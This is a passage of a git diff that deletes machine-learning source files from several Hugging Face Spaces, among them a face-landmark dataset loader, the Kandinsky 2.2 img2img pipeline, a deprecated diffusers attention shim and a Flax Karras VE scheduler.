to caffe's filelist) - """ - imlist = [] - with open(flist, 'r') as rf: - for line in rf.readlines(): - impath = line.strip() - imlist.append(impath) - - return imlist - -def jason_flist_reader(flist): - with open(flist, 'r') as fp: - info = json.load(fp) - return info - -def parse_label(label): - return torch.tensor(np.array(label).astype(np.float32)) - - -class FlistDataset(BaseDataset): - """ - It requires one directories to host training images '/path/to/data/train' - You can train the model with the dataset flag '--dataroot /path/to/data'. - """ - - def __init__(self, opt): - """Initialize this dataset class. - - Parameters: - opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions - """ - BaseDataset.__init__(self, opt) - - self.lm3d_std = load_lm3d(opt.bfm_folder) - - msk_names = default_flist_reader(opt.flist) - self.msk_paths = [os.path.join(opt.data_root, i) for i in msk_names] - - self.size = len(self.msk_paths) - self.opt = opt - - self.name = 'train' if opt.isTrain else 'val' - if '_' in opt.flist: - self.name += '_' + opt.flist.split(os.sep)[-1].split('_')[0] - - - def __getitem__(self, index): - """Return a data point and its metadata information. - - Parameters: - index (int) -- a random integer for data indexing - - Returns a dictionary that contains A, B, A_paths and B_paths - img (tensor) -- an image in the input domain - msk (tensor) -- its corresponding attention mask - lm (tensor) -- its corresponding 3d landmarks - im_paths (str) -- image paths - aug_flag (bool) -- a flag used to tell whether its raw or augmented - """ - msk_path = self.msk_paths[index % self.size] # make sure index is within then range - img_path = msk_path.replace('mask/', '') - lm_path = '.'.join(msk_path.replace('mask', 'landmarks').split('.')[:-1]) + '.txt' - - raw_img = Image.open(img_path).convert('RGB') - raw_msk = Image.open(msk_path).convert('RGB') - raw_lm = np.loadtxt(lm_path).astype(np.float32) - - _, img, lm, msk = align_img(raw_img, raw_lm, self.lm3d_std, raw_msk) - - aug_flag = self.opt.use_aug and self.opt.isTrain - if aug_flag: - img, lm, msk = self._augmentation(img, lm, self.opt, msk) - - _, H = img.size - M = estimate_norm(lm, H) - transform = get_transform() - img_tensor = transform(img) - msk_tensor = transform(msk)[:1, ...] - lm_tensor = parse_label(lm) - M_tensor = parse_label(M) - - - return {'imgs': img_tensor, - 'lms': lm_tensor, - 'msks': msk_tensor, - 'M': M_tensor, - 'im_paths': img_path, - 'aug_flag': aug_flag, - 'dataset': self.name} - - def _augmentation(self, img, lm, opt, msk=None): - affine, affine_inv, flip = get_affine_mat(opt, img.size) - img = apply_img_affine(img, affine_inv) - lm = apply_lm_affine(lm, affine, flip, img.size) - if msk is not None: - msk = apply_img_affine(msk, affine_inv, method=Image.BILINEAR) - return img, lm, msk - - - - - def __len__(self): - """Return the total number of images in the dataset. - """ - return self.size diff --git a/spaces/Alycer/VITS-Umamusume-voice-synthesizer/monotonic_align/__init__.py b/spaces/Alycer/VITS-Umamusume-voice-synthesizer/monotonic_align/__init__.py deleted file mode 100644 index 3d7009c40fea3a98168e3e3bc9ae061e91327422..0000000000000000000000000000000000000000 --- a/spaces/Alycer/VITS-Umamusume-voice-synthesizer/monotonic_align/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -import numpy as np -import torch -from .monotonic_align.core import maximum_path_c - - -def maximum_path(neg_cent, mask): - """ Cython optimized version. - neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(np.float32) - path = np.zeros(neg_cent.shape, dtype=np.int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(np.int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(np.int32) - maximum_path_c(path, neg_cent, t_t_max, t_s_max) - return torch.from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/pipelines/value_guided_sampling.md b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/pipelines/value_guided_sampling.md deleted file mode 100644 index 0509b196b57820e88bcff9c6821612df15313ebf..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/docs/source/en/api/pipelines/value_guided_sampling.md +++ /dev/null @@ -1,32 +0,0 @@ - - -# Value-guided planning - - - -🧪 This is an experimental pipeline for reinforcement learning! - - - -This pipeline is based on the [Planning with Diffusion for Flexible Behavior Synthesis](https://huggingface.co/papers/2205.09991) paper by Michael Janner, Yilun Du, Joshua B. Tenenbaum, Sergey Levine. - -The abstract from the paper is: - -*Model-based reinforcement learning methods often use learning only for the purpose of estimating an approximate dynamics model, offloading the rest of the decision-making work to classical trajectory optimizers. While conceptually simple, this combination has a number of empirical shortcomings, suggesting that learned models may not be well-suited to standard trajectory optimization. In this paper, we consider what it would look like to fold as much of the trajectory optimization pipeline as possible into the modeling problem, such that sampling from the model and planning with it become nearly identical. The core of our technical approach lies in a diffusion probabilistic model that plans by iteratively denoising trajectories. We show how classifier-guided sampling and image inpainting can be reinterpreted as coherent planning strategies, explore the unusual and useful properties of diffusion-based planning methods, and demonstrate the effectiveness of our framework in control settings that emphasize long-horizon decision-making and test-time flexibility*. - -You can find additional information about the model on the [project page](https://diffusion-planning.github.io/), the [original codebase](https://github.com/jannerm/diffuser), or try it out in a demo [notebook](https://colab.research.google.com/github/huggingface/notebooks/blob/main/diffusers/reinforcement_learning_with_diffusers.ipynb). - -The script to run the model is available [here](https://github.com/huggingface/diffusers/tree/main/examples/reinforcement_learning). - -## ValueGuidedRLPipeline -[[autodoc]] diffusers.experimental.ValueGuidedRLPipeline \ No newline at end of file diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/models/cross_attention.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/models/cross_attention.py deleted file mode 100644 index 44bc156b34cfa8536bdac0fee34709dfd66ae488..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/models/cross_attention.py +++ /dev/null @@ -1,94 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from ..utils import deprecate -from .attention_processor import ( # noqa: F401 - Attention, - AttentionProcessor, - AttnAddedKVProcessor, - AttnProcessor2_0, - LoRAAttnProcessor, - LoRALinearLayer, - LoRAXFormersAttnProcessor, - SlicedAttnAddedKVProcessor, - SlicedAttnProcessor, - XFormersAttnProcessor, -) -from .attention_processor import AttnProcessor as AttnProcessorRename # noqa: F401 - - -deprecate( - "cross_attention", - "0.20.0", - "Importing from cross_attention is deprecated. Please import from diffusers.models.attention_processor instead.", - standard_warn=False, -) - - -AttnProcessor = AttentionProcessor - - -class CrossAttention(Attention): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class CrossAttnProcessor(AttnProcessorRename): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class LoRACrossAttnProcessor(LoRAAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class CrossAttnAddedKVProcessor(AttnAddedKVProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class XFormersCrossAttnProcessor(XFormersAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class LoRAXFormersCrossAttnProcessor(LoRAXFormersAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class SlicedCrossAttnProcessor(SlicedAttnProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) - - -class SlicedCrossAttnAddedKVProcessor(SlicedAttnAddedKVProcessor): - def __init__(self, *args, **kwargs): - deprecation_message = f"{self.__class__.__name__} is deprecated and will be removed in `0.20.0`. Please use `from diffusers.models.attention_processor import {''.join(self.__class__.__name__.split('Cross'))} instead." - deprecate("cross_attention", "0.20.0", deprecation_message, standard_warn=False) - super().__init__(*args, **kwargs) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/kandinsky2_2/pipeline_kandinsky2_2_img2img.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/kandinsky2_2/pipeline_kandinsky2_2_img2img.py deleted file mode 100644 index dba50312e8d76cf6b368e9161b4a2c24492cafcd..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/pipelines/kandinsky2_2/pipeline_kandinsky2_2_img2img.py +++ /dev/null @@ -1,373 +0,0 @@ -# Copyright 2023 The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -from typing import Callable, List, Optional, Union - -import numpy as np -import PIL -import torch -from PIL import Image - -from ...models import UNet2DConditionModel, VQModel -from ...schedulers import DDPMScheduler -from ...utils import ( - is_accelerate_available, - is_accelerate_version, - logging, - randn_tensor, - replace_example_docstring, -) -from ..pipeline_utils import DiffusionPipeline, ImagePipelineOutput - - -logger = logging.get_logger(__name__) # pylint: disable=invalid-name - -EXAMPLE_DOC_STRING = """ - Examples: - ```py - >>> from diffusers import KandinskyV22Img2ImgPipeline, KandinskyV22PriorPipeline - >>> from diffusers.utils import load_image - >>> import torch - - >>> pipe_prior = KandinskyV22PriorPipeline.from_pretrained( - ... "kandinsky-community/kandinsky-2-2-prior", torch_dtype=torch.float16 - ... ) - >>> pipe_prior.to("cuda") - - >>> prompt = "A red cartoon frog, 4k" - >>> image_emb, zero_image_emb = pipe_prior(prompt, return_dict=False) - - >>> pipe = KandinskyV22Img2ImgPipeline.from_pretrained( - ... "kandinsky-community/kandinsky-2-2-decoder", torch_dtype=torch.float16 - ... ) - >>> pipe.to("cuda") - - >>> init_image = load_image( - ... "https://huggingface.co/datasets/hf-internal-testing/diffusers-images/resolve/main" - ... "/kandinsky/frog.png" - ... ) - - >>> image = pipe( - ... image=init_image, - ... image_embeds=image_emb, - ... negative_image_embeds=zero_image_emb, - ... height=768, - ... width=768, - ... num_inference_steps=100, - ... strength=0.2, - ... ).images - - >>> image[0].save("red_frog.png") - ``` -""" - - -# Copied from diffusers.pipelines.kandinsky2_2.pipeline_kandinsky2_2.downscale_height_and_width -def downscale_height_and_width(height, width, scale_factor=8): - new_height = height // scale_factor**2 - if height % scale_factor**2 != 0: - new_height += 1 - new_width = width // scale_factor**2 - if width % scale_factor**2 != 0: - new_width += 1 - return new_height * scale_factor, new_width * scale_factor - - -# Copied from diffusers.pipelines.kandinsky.pipeline_kandinsky_img2img.prepare_image -def prepare_image(pil_image, w=512, h=512): - pil_image = pil_image.resize((w, h), resample=Image.BICUBIC, reducing_gap=1) - arr = np.array(pil_image.convert("RGB")) - arr = arr.astype(np.float32) / 127.5 - 1 - arr = np.transpose(arr, [2, 0, 1]) - image = torch.from_numpy(arr).unsqueeze(0) - return image - - -class KandinskyV22Img2ImgPipeline(DiffusionPipeline): - """ - Pipeline for image-to-image generation using Kandinsky - - This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods the - library implements for all the pipelines (such as downloading or saving, running on a particular device, etc.) - - Args: - scheduler ([`DDIMScheduler`]): - A scheduler to be used in combination with `unet` to generate image latents. - unet ([`UNet2DConditionModel`]): - Conditional U-Net architecture to denoise the image embedding. - movq ([`VQModel`]): - MoVQ Decoder to generate the image from the latents. - """ - - def __init__( - self, - unet: UNet2DConditionModel, - scheduler: DDPMScheduler, - movq: VQModel, - ): - super().__init__() - - self.register_modules( - unet=unet, - scheduler=scheduler, - movq=movq, - ) - self.movq_scale_factor = 2 ** (len(self.movq.config.block_out_channels) - 1) - - # Copied from diffusers.pipelines.kandinsky.pipeline_kandinsky_img2img.KandinskyImg2ImgPipeline.get_timesteps - def get_timesteps(self, num_inference_steps, strength, device): - # get the original timestep using init_timestep - init_timestep = min(int(num_inference_steps * strength), num_inference_steps) - - t_start = max(num_inference_steps - init_timestep, 0) - timesteps = self.scheduler.timesteps[t_start:] - - return timesteps, num_inference_steps - t_start - - def prepare_latents(self, image, timestep, batch_size, num_images_per_prompt, dtype, device, generator=None): - if not isinstance(image, (torch.Tensor, PIL.Image.Image, list)): - raise ValueError( - f"`image` has to be of type `torch.Tensor`, `PIL.Image.Image` or list but is {type(image)}" - ) - - image = image.to(device=device, dtype=dtype) - - batch_size = batch_size * num_images_per_prompt - - if image.shape[1] == 4: - init_latents = image - - else: - if isinstance(generator, list) and len(generator) != batch_size: - raise ValueError( - f"You have passed a list of generators of length {len(generator)}, but requested an effective batch" - f" size of {batch_size}. Make sure the batch size matches the length of the generators." - ) - - elif isinstance(generator, list): - init_latents = [ - self.movq.encode(image[i : i + 1]).latent_dist.sample(generator[i]) for i in range(batch_size) - ] - init_latents = torch.cat(init_latents, dim=0) - else: - init_latents = self.movq.encode(image).latent_dist.sample(generator) - - init_latents = self.movq.config.scaling_factor * init_latents - - init_latents = torch.cat([init_latents], dim=0) - - shape = init_latents.shape - noise = randn_tensor(shape, generator=generator, device=device, dtype=dtype) - - # get latents - init_latents = self.scheduler.add_noise(init_latents, noise, timestep) - - latents = init_latents - - return latents - - # Copied from diffusers.pipelines.kandinsky2_2.pipeline_kandinsky2_2.KandinskyV22Pipeline.enable_model_cpu_offload - def enable_model_cpu_offload(self, gpu_id=0): - r""" - Offloads all models to CPU using accelerate, reducing memory usage with a low impact on performance. Compared - to `enable_sequential_cpu_offload`, this method moves one whole model at a time to the GPU when its `forward` - method is called, and the model remains in GPU until the next model runs. Memory savings are lower than with - `enable_sequential_cpu_offload`, but performance is much better due to the iterative execution of the `unet`. - """ - if is_accelerate_available() and is_accelerate_version(">=", "0.17.0.dev0"): - from accelerate import cpu_offload_with_hook - else: - raise ImportError("`enable_model_cpu_offload` requires `accelerate v0.17.0` or higher.") - - device = torch.device(f"cuda:{gpu_id}") - - if self.device.type != "cpu": - self.to("cpu", silence_dtype_warnings=True) - torch.cuda.empty_cache() # otherwise we don't see the memory savings (but they probably exist) - - hook = None - for cpu_offloaded_model in [self.unet, self.movq]: - _, hook = cpu_offload_with_hook(cpu_offloaded_model, device, prev_module_hook=hook) - - # We'll offload the last model manually. - self.final_offload_hook = hook - - @torch.no_grad() - @replace_example_docstring(EXAMPLE_DOC_STRING) - def __call__( - self, - image_embeds: Union[torch.FloatTensor, List[torch.FloatTensor]], - image: Union[torch.FloatTensor, PIL.Image.Image, List[torch.FloatTensor], List[PIL.Image.Image]], - negative_image_embeds: Union[torch.FloatTensor, List[torch.FloatTensor]], - height: int = 512, - width: int = 512, - num_inference_steps: int = 100, - guidance_scale: float = 4.0, - strength: float = 0.3, - num_images_per_prompt: int = 1, - generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None, - output_type: Optional[str] = "pil", - callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None, - callback_steps: int = 1, - return_dict: bool = True, - ): - """ - Function invoked when calling the pipeline for generation. - - Args: - image_embeds (`torch.FloatTensor` or `List[torch.FloatTensor]`): - The clip image embeddings for text prompt, that will be used to condition the image generation. - image (`torch.FloatTensor`, `PIL.Image.Image`, `np.ndarray`, `List[torch.FloatTensor]`, `List[PIL.Image.Image]`, or `List[np.ndarray]`): - `Image`, or tensor representing an image batch, that will be used as the starting point for the - process. Can also accpet image latents as `image`, if passing latents directly, it will not be encoded - again. - strength (`float`, *optional*, defaults to 0.8): - Conceptually, indicates how much to transform the reference `image`. Must be between 0 and 1. `image` - will be used as a starting point, adding more noise to it the larger the `strength`. The number of - denoising steps depends on the amount of noise initially added. When `strength` is 1, added noise will - be maximum and the denoising process will run for the full number of iterations specified in - `num_inference_steps`. A value of 1, therefore, essentially ignores `image`. - negative_image_embeds (`torch.FloatTensor` or `List[torch.FloatTensor]`): - The clip image embeddings for negative text prompt, will be used to condition the image generation. - height (`int`, *optional*, defaults to 512): - The height in pixels of the generated image. - width (`int`, *optional*, defaults to 512): - The width in pixels of the generated image. - num_inference_steps (`int`, *optional*, defaults to 100): - The number of denoising steps. More denoising steps usually lead to a higher quality image at the - expense of slower inference. - guidance_scale (`float`, *optional*, defaults to 4.0): - Guidance scale as defined in [Classifier-Free Diffusion Guidance](https://arxiv.org/abs/2207.12598). - `guidance_scale` is defined as `w` of equation 2. of [Imagen - Paper](https://arxiv.org/pdf/2205.11487.pdf). Guidance scale is enabled by setting `guidance_scale > - 1`. Higher guidance scale encourages to generate images that are closely linked to the text `prompt`, - usually at the expense of lower image quality. - num_images_per_prompt (`int`, *optional*, defaults to 1): - The number of images to generate per prompt. - generator (`torch.Generator` or `List[torch.Generator]`, *optional*): - One or a list of [torch generator(s)](https://pytorch.org/docs/stable/generated/torch.Generator.html) - to make generation deterministic. - output_type (`str`, *optional*, defaults to `"pil"`): - The output format of the generate image. Choose between: `"pil"` (`PIL.Image.Image`), `"np"` - (`np.array`) or `"pt"` (`torch.Tensor`). - callback (`Callable`, *optional*): - A function that calls every `callback_steps` steps during inference. The function is called with the - following arguments: `callback(step: int, timestep: int, latents: torch.FloatTensor)`. - callback_steps (`int`, *optional*, defaults to 1): - The frequency at which the `callback` function is called. If not specified, the callback is called at - every step. - return_dict (`bool`, *optional*, defaults to `True`): - Whether or not to return a [`~pipelines.ImagePipelineOutput`] instead of a plain tuple. - - Examples: - - Returns: - [`~pipelines.ImagePipelineOutput`] or `tuple` - """ - device = self._execution_device - - do_classifier_free_guidance = guidance_scale > 1.0 - - if isinstance(image_embeds, list): - image_embeds = torch.cat(image_embeds, dim=0) - batch_size = image_embeds.shape[0] - if isinstance(negative_image_embeds, list): - negative_image_embeds = torch.cat(negative_image_embeds, dim=0) - - if do_classifier_free_guidance: - image_embeds = image_embeds.repeat_interleave(num_images_per_prompt, dim=0) - negative_image_embeds = negative_image_embeds.repeat_interleave(num_images_per_prompt, dim=0) - - image_embeds = torch.cat([negative_image_embeds, image_embeds], dim=0).to( - dtype=self.unet.dtype, device=device - ) - - if not isinstance(image, list): - image = [image] - if not all(isinstance(i, (PIL.Image.Image, torch.Tensor)) for i in image): - raise ValueError( - f"Input is in incorrect format: {[type(i) for i in image]}. Currently, we only support PIL image and pytorch tensor" - ) - - image = torch.cat([prepare_image(i, width, height) for i in image], dim=0) - image = image.to(dtype=image_embeds.dtype, device=device) - - latents = self.movq.encode(image)["latents"] - latents = latents.repeat_interleave(num_images_per_prompt, dim=0) - self.scheduler.set_timesteps(num_inference_steps, device=device) - timesteps, num_inference_steps = self.get_timesteps(num_inference_steps, strength, device) - latent_timestep = timesteps[:1].repeat(batch_size * num_images_per_prompt) - height, width = downscale_height_and_width(height, width, self.movq_scale_factor) - latents = self.prepare_latents( - latents, latent_timestep, batch_size, num_images_per_prompt, image_embeds.dtype, device, generator - ) - for i, t in enumerate(self.progress_bar(timesteps)): - # expand the latents if we are doing classifier free guidance - latent_model_input = torch.cat([latents] * 2) if do_classifier_free_guidance else latents - - added_cond_kwargs = {"image_embeds": image_embeds} - noise_pred = self.unet( - sample=latent_model_input, - timestep=t, - encoder_hidden_states=None, - added_cond_kwargs=added_cond_kwargs, - return_dict=False, - )[0] - - if do_classifier_free_guidance: - noise_pred, variance_pred = noise_pred.split(latents.shape[1], dim=1) - noise_pred_uncond, noise_pred_text = noise_pred.chunk(2) - _, variance_pred_text = variance_pred.chunk(2) - noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond) - noise_pred = torch.cat([noise_pred, variance_pred_text], dim=1) - - if not ( - hasattr(self.scheduler.config, "variance_type") - and self.scheduler.config.variance_type in ["learned", "learned_range"] - ): - noise_pred, _ = noise_pred.split(latents.shape[1], dim=1) - - # compute the previous noisy sample x_t -> x_t-1 - latents = self.scheduler.step( - noise_pred, - t, - latents, - generator=generator, - )[0] - - if callback is not None and i % callback_steps == 0: - callback(i, t, latents) - - # post-processing - image = self.movq.decode(latents, force_not_quantize=True)["sample"] - - # Offload last model to CPU - if hasattr(self, "final_offload_hook") and self.final_offload_hook is not None: - self.final_offload_hook.offload() - - if output_type not in ["pt", "np", "pil"]: - raise ValueError(f"Only the output types `pt`, `pil` and `np` are supported not output_type={output_type}") - - if output_type in ["np", "pil"]: - image = image * 0.5 + 0.5 - image = image.clamp(0, 1) - image = image.cpu().permute(0, 2, 3, 1).float().numpy() - - if output_type == "pil": - image = self.numpy_to_pil(image) - - if not return_dict: - return (image,) - - return ImagePipelineOutput(images=image) diff --git a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/schedulers/scheduling_karras_ve_flax.py b/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/schedulers/scheduling_karras_ve_flax.py deleted file mode 100644 index 45c0dbddf7efd22df21cc9859e68d62b54aa8609..0000000000000000000000000000000000000000 --- a/spaces/Androidonnxfork/CivitAi-to-Diffusers/diffusers/src/diffusers/schedulers/scheduling_karras_ve_flax.py +++ /dev/null @@ -1,237 +0,0 @@ -# Copyright 2023 NVIDIA and The HuggingFace Team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -from dataclasses import dataclass -from typing import Optional, Tuple, Union - -import flax -import jax.numpy as jnp -from jax import random - -from ..configuration_utils import ConfigMixin, register_to_config -from ..utils import BaseOutput -from .scheduling_utils_flax import FlaxSchedulerMixin - - -@flax.struct.dataclass -class KarrasVeSchedulerState: - # setable values - num_inference_steps: Optional[int] = None - timesteps: Optional[jnp.ndarray] = None - schedule: Optional[jnp.ndarray] = None # sigma(t_i) - - @classmethod - def create(cls): - return cls() - - -@dataclass -class FlaxKarrasVeOutput(BaseOutput): - """ - Output class for the scheduler's step function output. - - Args: - prev_sample (`jnp.ndarray` of shape `(batch_size, num_channels, height, width)` for images): - Computed sample (x_{t-1}) of previous timestep. `prev_sample` should be used as next model input in the - denoising loop. - derivative (`jnp.ndarray` of shape `(batch_size, num_channels, height, width)` for images): - Derivative of predicted original image sample (x_0). - state (`KarrasVeSchedulerState`): the `FlaxKarrasVeScheduler` state data class. - """ - - prev_sample: jnp.ndarray - derivative: jnp.ndarray - state: KarrasVeSchedulerState - - -class FlaxKarrasVeScheduler(FlaxSchedulerMixin, ConfigMixin): - """ - Stochastic sampling from Karras et al. [1] tailored to the Variance-Expanding (VE) models [2]. Use Algorithm 2 and - the VE column of Table 1 from [1] for reference. - - [1] Karras, Tero, et al. "Elucidating the Design Space of Diffusion-Based Generative Models." - https://arxiv.org/abs/2206.00364 [2] Song, Yang, et al. "Score-based generative modeling through stochastic - differential equations." https://arxiv.org/abs/2011.13456 - - [`~ConfigMixin`] takes care of storing all config attributes that are passed in the scheduler's `__init__` - function, such as `num_train_timesteps`. They can be accessed via `scheduler.config.num_train_timesteps`. - [`SchedulerMixin`] provides general loading and saving functionality via the [`SchedulerMixin.save_pretrained`] and - [`~SchedulerMixin.from_pretrained`] functions. - - For more details on the parameters, see the original paper's Appendix E.: "Elucidating the Design Space of - Diffusion-Based Generative Models." https://arxiv.org/abs/2206.00364. The grid search values used to find the - optimal {s_noise, s_churn, s_min, s_max} for a specific model are described in Table 5 of the paper. - - Args: - sigma_min (`float`): minimum noise magnitude - sigma_max (`float`): maximum noise magnitude - s_noise (`float`): the amount of additional noise to counteract loss of detail during sampling. - A reasonable range is [1.000, 1.011]. - s_churn (`float`): the parameter controlling the overall amount of stochasticity. - A reasonable range is [0, 100]. - s_min (`float`): the start value of the sigma range where we add noise (enable stochasticity). - A reasonable range is [0, 10]. - s_max (`float`): the end value of the sigma range where we add noise. - A reasonable range is [0.2, 80]. - """ - - @property - def has_state(self): - return True - - @register_to_config - def __init__( - self, - sigma_min: float = 0.02, - sigma_max: float = 100, - s_noise: float = 1.007, - s_churn: float = 80, - s_min: float = 0.05, - s_max: float = 50, - ): - pass - - def create_state(self): - return KarrasVeSchedulerState.create() - - def set_timesteps( - self, state: KarrasVeSchedulerState, num_inference_steps: int, shape: Tuple = () - ) -> KarrasVeSchedulerState: - """ - Sets the continuous timesteps used for the diffusion chain. Supporting function to be run before inference. - - Args: - state (`KarrasVeSchedulerState`): - the `FlaxKarrasVeScheduler` state data class. - num_inference_steps (`int`): - the number of diffusion steps used when generating samples with a pre-trained model. - - """ - timesteps = jnp.arange(0, num_inference_steps)[::-1].copy() - schedule = [ - ( - self.config.sigma_max**2 - * (self.config.sigma_min**2 / self.config.sigma_max**2) ** (i / (num_inference_steps - 1)) - ) - for i in timesteps - ] - - return state.replace( - num_inference_steps=num_inference_steps, - schedule=jnp.array(schedule, dtype=jnp.float32), - timesteps=timesteps, - ) - - def add_noise_to_input( - self, - state: KarrasVeSchedulerState, - sample: jnp.ndarray, - sigma: float, - key: random.KeyArray, - ) -> Tuple[jnp.ndarray, float]: - """ - Explicit Langevin-like "churn" step of adding noise to the sample according to a factor gamma_i ≥ 0 to reach a - higher noise level sigma_hat = sigma_i + gamma_i*sigma_i. - - TODO Args: - """ - if self.config.s_min <= sigma <= self.config.s_max: - gamma = min(self.config.s_churn / state.num_inference_steps, 2**0.5 - 1) - else: - gamma = 0 - - # sample eps ~ N(0, S_noise^2 * I) - key = random.split(key, num=1) - eps = self.config.s_noise * random.normal(key=key, shape=sample.shape) - sigma_hat = sigma + gamma * sigma - sample_hat = sample + ((sigma_hat**2 - sigma**2) ** 0.5 * eps) - - return sample_hat, sigma_hat - - def step( - self, - state: KarrasVeSchedulerState, - model_output: jnp.ndarray, - sigma_hat: float, - sigma_prev: float, - sample_hat: jnp.ndarray, - return_dict: bool = True, - ) -> Union[FlaxKarrasVeOutput, Tuple]: - """ - Predict the sample at the previous timestep by reversing the SDE. Core function to propagate the diffusion - process from the learned model outputs (most often the predicted noise). - - Args: - state (`KarrasVeSchedulerState`): the `FlaxKarrasVeScheduler` state data class. - model_output (`torch.FloatTensor` or `np.ndarray`): direct output from learned diffusion model. - sigma_hat (`float`): TODO - sigma_prev (`float`): TODO - sample_hat (`torch.FloatTensor` or `np.ndarray`): TODO - return_dict (`bool`): option for returning tuple rather than FlaxKarrasVeOutput class - - Returns: - [`~schedulers.scheduling_karras_ve_flax.FlaxKarrasVeOutput`] or `tuple`: Updated sample in the diffusion - chain and derivative. [`~schedulers.scheduling_karras_ve_flax.FlaxKarrasVeOutput`] if `return_dict` is - True, otherwise a `tuple`. When returning a tuple, the first element is the sample tensor. - """ - - pred_original_sample = sample_hat + sigma_hat * model_output - derivative = (sample_hat - pred_original_sample) / sigma_hat - sample_prev = sample_hat + (sigma_prev - sigma_hat) * derivative - - if not return_dict: - return (sample_prev, derivative, state) - - return FlaxKarrasVeOutput(prev_sample=sample_prev, derivative=derivative, state=state) - - def step_correct( - self, - state: KarrasVeSchedulerState, - model_output: jnp.ndarray, - sigma_hat: float, - sigma_prev: float, - sample_hat: jnp.ndarray, - sample_prev: jnp.ndarray, - derivative: jnp.ndarray, - return_dict: bool = True, - ) -> Union[FlaxKarrasVeOutput, Tuple]: - """ - Correct the predicted sample based on the output model_output of the network. TODO complete description - - Args: - state (`KarrasVeSchedulerState`): the `FlaxKarrasVeScheduler` state data class. - model_output (`torch.FloatTensor` or `np.ndarray`): direct output from learned diffusion model. - sigma_hat (`float`): TODO - sigma_prev (`float`): TODO - sample_hat (`torch.FloatTensor` or `np.ndarray`): TODO - sample_prev 